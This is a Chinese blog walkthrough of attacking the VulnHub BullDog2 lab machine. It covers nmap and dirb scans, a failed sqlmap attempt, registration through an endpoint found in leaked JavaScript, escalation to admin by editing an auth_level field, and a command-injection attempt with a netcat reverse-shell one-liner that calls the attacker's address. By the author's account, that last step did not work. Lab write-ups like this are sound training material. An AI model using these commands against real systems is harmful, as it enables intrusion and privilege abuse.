[VulnHub靶机渗透]二:BullDog2

一、实验环境

kali: 192.168.137.128
BullDog2: 192.168.56.101
在这里插入图片描述

二、实验步骤

2.1 扫描端口

nmap -sS -sV -T4 192.168.56.101
在这里插入图片描述

2.2 目录扫描

dirb http://192.168.56.101
在这里插入图片描述

2.3 站点渗透

login模块:

在login界面尝试用万能密码和sqlmap:

sqlmap -u "http://192.168.56.101/users/authenticate" --cookie="username=123&password=123" --level=2 

sql注入看来是行不通了
在这里插入图片描述

register模块(垂直越权漏洞)

注册界面是不能注册的

调出控制器发现存在js泄露
在这里插入图片描述
将这四个文件保存到本地,用JSFormat整理一下进行代码审计:
在这里插入图片描述
最多的有几万代码,一行一行看不切实际,换个思路,毕竟这是注册界面的代码,搜索一些关键字例如:
register username password admin等等

最后在第四个js文件找到了注册用户时,需要提供的参数。
在这里插入图片描述

由于注册界面无从下手,只能从登陆界面进行改参传参:
抓包,发送到reperter,
修改请求路径为JS文件中的注册路径:/users/register,添加name,email注册必须的信息,发包.
在这里插入图片描述
可以成功登陆,登陆界面会显示我们的name参数值
在这里插入图片描述
点击右上角的profile没有任何反应,重新登录并抓包,选定响应该请求(Response to this request),查看响应包,检查一下是否有越权漏洞
在这里插入图片描述

发现特殊字符串"auth_level":"standard_user"通过名字可以看出是关于用户权限的.
回到js代码中搜索关键字 auth_level
在这里插入图片描述
尝试修改参数为master_admin_user
我们的权限变为admin了

在这里插入图片描述

3.1 命令执行漏洞

在此处账号和密码我是随便输的,结果响应状态码依旧为200

但最后一行显示的为false

在这里插入图片描述

去网上搜索一波,可以在此处进行反弹shell,并且只能用下面这个,其他的都没有成功,

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.137.128 8888 >/tmp/f;

kali中监听8888端口:
在这里插入图片描述

burpsuite发送数据包:
在这里插入图片描述
先搁置。。。。一直没有反弹shell,哪位大佬可以帮忙解答一下。。。。

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值